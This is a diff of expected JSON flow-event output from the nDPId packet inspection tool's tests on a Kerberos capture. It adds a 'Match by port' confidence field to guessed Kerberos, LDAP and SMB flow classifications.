 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":477,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00698{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00701{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00701{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00701{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00697{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","ndpi": {"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","ndpi": {"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","ndpi": {"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","ndpi": {"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","ndpi": {"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","ndpi": {"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","ndpi": {"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","ndpi": {"proto":"SMBv23","breed":"Acceptable","category":"System"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","ndpi": {"proto":"SMBv23","breed":"Acceptable","category":"System"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
